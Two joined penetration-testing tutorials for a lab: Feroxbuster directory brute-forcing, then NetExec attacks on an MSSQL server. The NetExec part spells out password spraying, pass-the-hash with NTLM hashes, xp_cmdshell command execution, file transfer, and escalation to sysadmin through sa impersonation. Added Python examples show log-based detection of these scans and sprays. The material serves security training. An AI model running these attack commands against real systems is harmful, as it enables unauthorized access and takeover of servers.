A Detailed Guide on Feroxbuster

Feroxbuster is a robust tool designed to identify directories and files on web servers using brute-force techniques. It is frequently used in penetration testing and security assessments to find concealed paths and resources. Here we are going to discuss the various tasks that can be performed with Feroxbuster.

Table of contents

·      Lab setup

·      Installation

·      Default mode

·      Redirects

·      Extensions

·      Result output

·      User agent

·      Filter status code

·      Quiet mode

·      Controlling threads

·      Custom wordlist

·      Disable recursion

·      Limit recursion depth

·      Force Recursion

·      Filter by character size

·      Filter by number of words

·      Filter by number of lines

·      Filter by status code using deny list

·      Filter by status code using allow list

·      Generating random User-Agent

·      HTTP methods

·      Custom headers

·      Cookies

·      Adding slash

·      Capturing requests in Burp

·      Read target from list

·      Resume from last state

·      Follow redirect

·      Timeout

·      Comparison between Feroxbuster and other tools

·      Conclusion

Lab setup

Target Machine: 192.168.1.4

Attacker Machine: 192.168.1.31 (Kali Linux)

After setting up a web server on the target machine, we can proceed with the enumeration from Kali Linux once Feroxbuster is installed.

Installation

To install Feroxbuster on Kali Linux, we can use the following command:

apt install feroxbuster



Default mode

Once the installation is done, we can proceed with the enumeration. To perform a default directory brute force, we can use the following command:

feroxbuster -u http://192.168.1.4



It can be seen from the output above that the wordlist used in default mode is raft-medium-directories.txt.

To get a less verbose output, we can use the --silent flag to hide the non-essential data.

feroxbuster -u http://192.168.1.4 --silent



Redirects

To allow Feroxbuster to continue directory brute forcing on the redirected URL, we can use the -r or --redirects flag. For example, if http://192.168.1.4 redirects to http://192.168.1.4/newpath, Feroxbuster will follow the redirection and continue scanning http://192.168.1.4/newpath for directories and files.

feroxbuster -u http://192.168.1.4 -r



Extensions

To brute-force files with particular extensions, the -x or --extensions flag can be used.

feroxbuster -u http://192.168.1.4 -x php,txt --silent



Result output

If we want to log the output to a file, we use the --output flag followed by the file name.

feroxbuster -u http://192.168.1.4 --output results.txt



User agent

To set a custom User-Agent for the requests sent to the server, we can use the -a or --user-agent flag. By default, the User-Agent used by Feroxbuster is feroxbuster/<version>.

feroxbuster -u http://192.168.1.4 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"



Filter status code

There are times when we need to skip responses with certain status codes; the -C or --filter-status flag skips results with the listed codes. If we want only particular status codes in the output, we can use the -s or --status-codes flag.

feroxbuster -u http://192.168.1.4 -C 403,404



Quiet mode

To present the output without the progress bar or banner, we can use quiet mode by giving the -q or --quiet flag.

feroxbuster -u http://192.168.1.4 -q



Controlling threads

To control the number of concurrent threads depending on the target environment, we can use the -t or --threads flag. The default value is 50 threads.

feroxbuster -u http://192.168.1.4 -t 20



Custom wordlist

To use a custom wordlist, we can use the -w or --wordlist flag followed by the wordlist path. Here we are giving the path of the common.txt file.

feroxbuster -u http://192.168.1.4 -w /usr/share/wordlists/dirb/common.txt



Disable recursion

To scan only the top-level directory, we can set the -n or --no-recursion flag to disable recursive scanning.

feroxbuster -u http://192.168.1.4 -n



Limit recursion depth

To set a limit on the depth of recursion, we can use the -L or --scan-limit.

feroxbuster -u http://192.168.1.4 -L 4



Force Recursion

To ensure that recursion is used, we can use the --force-recursion flag.

feroxbuster -u http://192.168.1.4 --force-recursion



Filter by character size

To filter out responses of a particular length, we can use the -S or --filter-size flag. This filters on the size of the response in characters.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q -S 285,286,283,289



Filter by number of words

To filter out results by their number of words, we can use the -W or --filter-words flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q -W 33



Filter by number of lines

To filter out results by their number of lines, we can use the -N or --filter-lines flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q -N 9



Filter by status code using deny list

To filter the results by status code using a deny list, we can use the --filter-status flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q --filter-status 404



Filter by status code using allow list

To filter the results by status code using an allow list, we can use the --status-codes flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q --status-codes 200,301
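The size, word, line and status filters above all act on the per-response counts that Feroxbuster prints (and writes with --output) as the l/w/c columns before each URL. The following is an added example, not Feroxbuster's own code: it parses result lines in that text layout and applies the same deny/allow logic offline, which is handy for re-filtering a saved results file without rescanning. The sample lines are constructed to mirror the lab target, not captured output, and the column layout is assumed to match Feroxbuster's default text output.

```python
"""Offline re-filtering of feroxbuster --output result lines.

Added example (not feroxbuster's own code). Each result line carries:
status, method, line count (l), word count (w), byte count (c), URL.
SAMPLE_OUTPUT is constructed for illustration, not captured from a scan.
"""
import re
from dataclasses import dataclass

# constructed sample in the same shape as a feroxbuster --output file
SAMPLE_OUTPUT = """\
200      GET       10l       33w      285c http://192.168.1.4/
404      GET        9l       31w      283c http://192.168.1.4/.hta
404      GET        9l       31w      286c http://192.168.1.4/config
301      GET        9l       28w      313c http://192.168.1.4/uploads => http://192.168.1.4/uploads/
403      GET        9l       28w      278c http://192.168.1.4/server-status
200      GET       25l       73w     1025c http://192.168.1.4/admin.php
"""

LINE_RE = re.compile(
    r"^(?P<status>\d{3})\s+(?P<method>[A-Z]+)\s+(?P<lines>\d+)l\s+"
    r"(?P<words>\d+)w\s+(?P<chars>\d+)c\s+(?P<url>\S+)"
)


@dataclass(frozen=True)
class Result:
    status: int
    method: str
    lines: int
    words: int
    chars: int
    url: str


def parse_output(text):
    """Parse feroxbuster result lines; lines that do not match are skipped."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            results.append(Result(int(m["status"]), m["method"], int(m["lines"]),
                                  int(m["words"]), int(m["chars"]), m["url"]))
    return results


def apply_filters(results, filter_size=(), filter_words=(), filter_lines=(),
                  filter_status=(), status_codes=()):
    """Mirror of -S / -W / -N (deny by size, words, lines), -C (deny by
    status) and -s (allow by status). Any deny-list match drops the result;
    when an allow list is given, only those statuses are kept."""
    kept = []
    for r in results:
        if r.chars in filter_size or r.words in filter_words or r.lines in filter_lines:
            continue
        if r.status in filter_status:
            continue
        if status_codes and r.status not in status_codes:
            continue
        kept.append(r)
    return kept


def urls(results):
    """Just the URLs, in scan order, for printing or diffing."""
    return [r.url for r in results]


if __name__ == "__main__":
    res = parse_output(SAMPLE_OUTPUT)
    # same effect as: feroxbuster ... -S 283,286 (drops the two 404 "not found" pages)
    for u in urls(apply_filters(res, filter_size={283, 286})):
        print(u)
```

The point of doing this offline is that a size-based deny list is usually chosen after a first quick scan: look at which c values the 404 or soft-404 pages share, then feed exactly those to -S, -W or -N.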



Generating random User-Agent

To use a random User-Agent for every request, we can use the -A flag. Here we have also used the --burp flag to show how the User-Agent looks in the captured requests.

feroxbuster -u http://192.168.1.4 -A --burp
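From the defender's side, the default feroxbuster/<version> User-Agent mentioned above is an easy signal in web server logs, but -a and -A replace it, so a robust detection should not rely on the User-Agent alone. The following is an added example, not part of the article or of Feroxbuster: it reads Apache combined-format access log lines, lists clients announcing the default User-Agent, and separately flags clients that send a burst of requests with a high 404 ratio, which is what a directory brute force looks like regardless of the User-Agent. The log lines are constructed (the version string is a placeholder), and the window and threshold values are assumptions to tune per environment.

```python
"""Spotting directory brute-forcing in web server access logs.

Added example (not feroxbuster's own code). SAMPLE_LOG is constructed in
Apache combined format; the feroxbuster version in the User-Agent is a
placeholder. Thresholds are assumptions and should be tuned per site.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# constructed sample: a normal browser visit, a scan with the default
# User-Agent, and a scan with a randomised User-Agent (as -A would produce)
SAMPLE_LOG = """\
192.168.1.50 - - [11/Aug/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 285 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [11/Aug/2024:10:00:02 +0000] "GET /style.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.31 - - [11/Aug/2024:10:01:00 +0000] "GET /.hta HTTP/1.1" 404 283 "-" "feroxbuster/2.0.0"
192.168.1.31 - - [11/Aug/2024:10:01:00 +0000] "GET /config HTTP/1.1" 404 286 "-" "feroxbuster/2.0.0"
192.168.1.31 - - [11/Aug/2024:10:01:00 +0000] "GET /admin.php HTTP/1.1" 200 1025 "-" "feroxbuster/2.0.0"
192.168.1.77 - - [11/Aug/2024:10:02:00 +0000] "GET /backup HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.77 - - [11/Aug/2024:10:02:00 +0000] "GET /old HTTP/1.1" 404 286 "-" "curl/8.0"
192.168.1.77 - - [11/Aug/2024:10:02:01 +0000] "GET /test HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh)"
192.168.1.77 - - [11/Aug/2024:10:02:01 +0000] "GET /dev HTTP/1.1" 404 286 "-" "python-requests/2.31"
192.168.1.77 - - [11/Aug/2024:10:02:02 +0000] "GET /uploads HTTP/1.1" 301 313 "-" "Go-http-client/1.1"
"""


def parse_log(text):
    """Return (ip, timestamp, path, status, user_agent) per parsable line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["ip"], ts, m["path"], int(m["status"]), m["ua"]))
    return events


def default_ua_clients(events):
    """Clients that announce feroxbuster's default User-Agent prefix."""
    return sorted({ip for ip, _, _, _, ua in events if ua.startswith("feroxbuster/")})


def bursty_clients(events, window_seconds=60, min_requests=5, min_404_ratio=0.6):
    """Clients with at least min_requests inside one window where the share
    of 404 responses is at least min_404_ratio. Independent of User-Agent,
    so it still fires when -a or -A is used."""
    by_ip = defaultdict(list)
    for ip, ts, _, status, _ in events:
        by_ip[ip].append((ts, status))
    flagged = []
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i in range(len(reqs)):
            start = reqs[i][0]
            window = [s for t, s in reqs[i:] if (t - start).total_seconds() <= window_seconds]
            if len(window) >= min_requests and window.count(404) / len(window) >= min_404_ratio:
                flagged.append(ip)
                break
    return sorted(flagged)


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("default User-Agent:", default_ua_clients(ev))
    print("bursty 404 clients:", bursty_clients(ev))
```

With the defaults above, 192.168.1.31 is caught only by its User-Agent (three requests is below the burst threshold) while 192.168.1.77 is caught by the 404 burst despite rotating its User-Agent; lowering min_requests to 3 catches both by rate.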



HTTP methods

To explicitly define the HTTP method to be used, we can use the -m flag followed by the method, for example POST. The default method is GET.

feroxbuster -u http://192.168.1.4 -m POST



Custom headers

To explicitly define a request header, we can use the -H flag followed by the header along with its value, for example 'Content-Type: application/x-www-form-urlencoded'. Here we have also used the --burp flag to show how the header looks in the captured requests.

feroxbuster -u http://192.168.1.4 -H 'Content-Type: application/x-www-form-urlencoded' --burp -q



Cookies

To send a specific cookie value in all the requests, we can give the cookie name along with its value using the --cookies or -b flag. Here we have also used the --burp flag to show how the cookie looks in the captured requests.

feroxbuster -u http://192.168.1.4 --cookies PHPSESSID=t54ij15l5d51i2tc7j1k1tu4p4 --burp -q



Adding slash

To add a slash (/) after every request, we can use the -f or --add-slash flag.

feroxbuster -u http://192.168.1.4 -f



Capturing requests in Burp

To capture the requests in Burp Suite, we can use the --burp flag while running the scan.

feroxbuster -u http://192.168.1.4 --burp


Read target from list

To scan the targets listed in a file, we can pipe the list to Feroxbuster and use the --stdin flag:

cat target.txt

cat target.txt | feroxbuster --stdin -q



Resume from last state

There are times when we need to terminate a scan midway; Feroxbuster saves its progress in a .state file. To resume the scan from that point, we can use the --resume-from flag and provide the .state file.

feroxbuster -u http://192.168.1.4 -q

feroxbuster --resume-from ferox-http_192_168_1_4-1723370176.state -q



Follow redirect

If some requests during the scan result in a redirection, we can allow the client to follow the redirects using the -r flag.

feroxbuster -u http://192.168.1.4 -r



Timeout

To set a timeout limit, we can use the -T flag. This determines how long Feroxbuster will wait for a server response before giving up on the request. By default this value is 7 seconds; we can modify it using the flag.

feroxbuster -u http://192.168.1.4



The above image shows the default timeout limit in use; now we modify it to 5 seconds.

feroxbuster -u http://192.168.1.4 -T 5




Comparison between Feroxbuster and other tools

·      Feroxbuster stands out for its comprehensive set of features, including extensive response filtering, Burp Suite integration, and customization options. It provides a balance between advanced functionality and user control, making it a powerful choice for detailed and nuanced directory and file brute-forcing.

·      DirBuster is user-friendly with its GUI but may not be as fast or flexible as command-line tools like Feroxbuster.

·      Gobuster offers speed and efficiency but with fewer advanced features and less flexibility compared to Feroxbuster.

·      ffuf provides high performance and extensive filtering but can be complex to configure and use.

Conclusion

In conclusion, we can say that Feroxbuster is an excellent choice for those requiring precise control over their scanning processes, advanced filtering capabilities, and the ability to integrate with other tools.

MSSQL for Pentester: NetExec

NetExec (nxc) is a powerful network exploitation tool developed as a modern successor to CrackMapExec (CME), which was widely used by penetration testers and red teamers. CrackMapExec was earlier actively maintained by mpgn, after which NetExec emerged as the popular choice. In this article we are going to cover most of the areas where this tool comes in handy for automating tasks like password spraying, command execution, file upload and more. Here we will be running the test cases against an MSSQL server using the nxc tool.

Table of Contents

·      Lab Setup

·      Password spray using nxc

·      Command execution using nxc

·      File upload and download using nxc

·      Privilege escalation using nxc

·      Command execution as administrator using nxc

·      Enumeration on a different port number

·      Password spray using nxc continued

·      Conclusion

Lab Setup

Target Machine: Windows 10 (192.168.31.126)

Attacker Machine: Kali Linux (192.168.31.141)

For demonstration purposes, we will be using the MSSQL service to show all the test cases. We have already set up the MSSQL server on the target machine and created a few users for the running instance.



Password spray using nxc

In order to check for valid credentials, we will create a list of usernames as users.txt and a list of passwords as pass.txt. Once the lists are created, we can perform the password spray against the MSSQL server to find valid username and password pairs. The command to do so is:

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success | grep '[+]'



To perform the password spray using local authentication, we can use the --local-auth flag, which specifies that the authentication attempts should be made against the local accounts on the MSSQL server.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --local-auth | grep '[+]'



If we want each username to be tried only with the password at the same position in its list, we can use the --no-bruteforce flag. If the username-password pair matches it proceeds; otherwise it skips to the next pair without trying other combinations.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --no-bruteforce



There are situations where we have NTLM hashes instead of passwords, so we can use nxc to perform the password spray with the hash by giving the -H flag.

nxc mssql 192.168.31.126 -u users.txt -H 64FBAE31CC352FC26AF97CBDEF151E03 --continue-on-success | grep '[+]'



There are two methods to authenticate to MSSQL, i.e. Windows or local; the default is Windows authentication. To use local authentication, add the --local-auth flag to the command. Here we are performing local authentication as the sa user.

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth



As mentioned previously, we can also test Windows authentication. Since the default mode is Windows authentication, we don't need to give any authentication flag.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987'



Command execution using nxc

We can use nxc to query the database by giving the -q flag followed by the query. The command to do so is:

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'




To execute system-level commands, we can use the -x flag, which uses MSSQL's xp_cmdshell to run them. Either Windows or local authentication can be used here, depending on our need.

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth -x ipconfig

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' -x ipconfig





File upload and download using nxc

We can also upload a file to the target system using nxc with the --put-file flag, which takes the local filename followed by the path where the file is to be uploaded.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --put-file file.txt C:\\Windows\\Temp\\file.txt



It can be seen that the file has been successfully uploaded at the required path.



Similarly, we can download a file using the --get-file flag. Here we give the complete path of the file to be downloaded and the path where it should be placed on our end.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --get-file C:\\Windows\\Temp\\file.txt /tmp/file.txt



Privilege escalation using nxc

Here we check whether the current user is allowed to escalate privileges by using the mssql_priv module of nxc. The module name is given after the -M flag. Here we use the raj user; this applies to cases where we authenticate with Windows authentication and then try for privilege escalation. The output of the command shows that user raj can impersonate the sa user. Impersonating a user means temporarily assuming the identity and privileges of that user.

nxc mssql 192.168.31.126 -u raj -p 'Password@1' -M mssql_priv



The same process can be repeated using the local authentication by adding the --local-auth flag.

nxc mssql 192.168.31.126 -u ignite -p 'Password@1' -M mssql_priv --local-auth


It can be seen that user ignite can impersonate user sa using local authentication, so we will perform the privilege escalation as the next step. The properties of the ignite user can also be seen on the victim machine.

To perform the privilege escalation, we will use the Metasploit framework. Its auxiliary/admin/mssql/mssql_escalate_execute_as module can be used for this. The commands used in the module are:

use auxiliary/admin/mssql/mssql_escalate_execute_as

set rhosts 192.168.31.126

set database master

set username ignite

set password Password@1

exploit

After running the exploit, it shows that user ignite is now sysadmin. To verify, we run the earlier nxc command once again; its output shows that user ignite is already a sysadmin. This can also be confirmed on the victim machine.




Command execution as administrator using nxc

Let us assume that we have somehow obtained the hash of the administrator user and want to execute system-level commands through MSSQL; nxc can do that too. First we check whether Windows authentication succeeds, then we add the -x flag to execute the command.

nxc mssql 192.168.31.126 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

nxc mssql 192.168.31.126 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig


Enumeration on a different port number

If the MSSQL server is running on a different port, we can still perform the same test cases by specifying the port explicitly with the --port flag.

nmap -sV -p 9070 192.168.31.126



As we can see, the MSSQL server is running on port 9070, so the command is as follows:

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --port 9070



Password spray using nxc continued

Once we have the lists of usernames and passwords, we can perform the password spray using nxc, mentioning the authentication method explicitly if needed. If no flag is given, Windows authentication is used. Here we use the --continue-on-success flag so that all combinations are tried even after a successful login is obtained.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success



Similarly, we can perform the password spray using the local authentication.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --local-auth



The above scenario clearly shows which user accounts are valid for local authentication and which for Windows authentication.

We can do the same when we have obtained a hash but are not sure which user it belongs to. Here we pass a list of users and give the obtained hash value with the -H flag.

nxc mssql 192.168.31.126 -u users.txt -H 64FBAE31CC352FC26AF97CBDEF151E03 --continue-on-success
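A spray like the ones run in this section and in the earlier "Password spray using nxc" section leaves a characteristic trace on the server: a burst of failed logins for many distinct usernames from one client address, sometimes followed by a success. The following is an added example, not part of the article or of NetExec: it parses SQL Server ERRORLOG-style logon lines, flags client IPs that fail against several distinct logins within a short window, and reports any successful login from such a client, which is the credential to act on first. The log lines are constructed in the shape SQL Server writes (the dbuser names are made up), and the window and threshold are assumptions to tune per environment.

```python
"""Detecting MSSQL password spraying from SQL Server error log lines.

Added example (not NetExec's own code). SAMPLE_ERRORLOG is constructed in
the shape of SQL Server's ERRORLOG logon messages; it is not a capture from
the lab. Window and threshold values are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

_TS = r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)"
FAIL_RE = re.compile(
    _TS + r"\s+Logon\s+Login failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<ip>[^\]]+)\]"
)
SUCCESS_RE = re.compile(
    _TS + r"\s+Logon\s+Login succeeded for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<ip>[^\]]+)\]"
)

# constructed sample: one client spraying five logins in under a second and
# landing a valid password, plus an unrelated client mistyping one password
SAMPLE_ERRORLOG = """\
2024-08-11 10:05:01.23 Logon       Error: 18456, Severity: 14, State: 8.
2024-08-11 10:05:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.31.141]
2024-08-11 10:05:01.31 Logon       Login failed for user 'raj'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.31.141]
2024-08-11 10:05:01.40 Logon       Login failed for user 'ignite'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.31.141]
2024-08-11 10:05:01.52 Logon       Login failed for user 'dbuser1'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.31.141]
2024-08-11 10:05:01.60 Logon       Login failed for user 'dbuser2'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.31.141]
2024-08-11 10:05:01.75 Logon       Login succeeded for user 'ignite'. Connection made using SQL Server authentication. [CLIENT: 192.168.31.141]
2024-08-11 11:30:00.10 Logon       Login failed for user 'raj'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.31.50]
2024-08-11 11:31:00.10 Logon       Login failed for user 'raj'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.31.50]
"""


def parse_events(text):
    """Return (timestamp, client_ip, user, 'fail'|'success') per logon line."""
    events = []
    for line in text.splitlines():
        for kind, rx in (("fail", FAIL_RE), ("success", SUCCESS_RE)):
            m = rx.match(line)
            if m:
                ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
                events.append((ts, m["ip"], m["user"], kind))
    return events


def spray_sources(events, window=timedelta(minutes=5), min_distinct_users=3):
    """Client IPs whose failed logins cover at least min_distinct_users
    distinct usernames inside one window. Counting distinct users, not raw
    attempts, is what separates a spray from a single-account brute force.
    Returns {ip: sorted list of usernames tried}."""
    by_ip = defaultdict(list)
    for ts, ip, user, kind in events:
        if kind == "fail":
            by_ip[ip].append((ts, user))
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_distinct_users:
                flagged[ip] = sorted(users)
                break
    return flagged


def successes_from_spray_sources(events, flagged):
    """Successful logins from clients already flagged as spraying: the
    credential the spray found, i.e. the account to reset first."""
    return [(ip, user) for _, ip, user, kind in events
            if kind == "success" and ip in flagged]


if __name__ == "__main__":
    ev = parse_events(SAMPLE_ERRORLOG)
    hits = spray_sources(ev)
    print("spraying clients:", hits)
    print("successful logins from them:", successes_from_spray_sources(ev, hits))
```

The unrelated client 192.168.31.50 is not flagged because both of its failures are for the same login; a --no-bruteforce run, which pairs each username with one password, produces exactly the one-attempt-per-user pattern the distinct-user count is designed to catch.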



Conclusion

NetExec (nxc) stands out as a highly effective and adaptable tool for security experts, delivering advanced features for network exploitation and post-exploitation tasks. Its comprehensive functionality allows for efficient password spraying and command execution on not only MSSQL server but other services as well, making it an essential asset in both penetration testing and red teaming operations.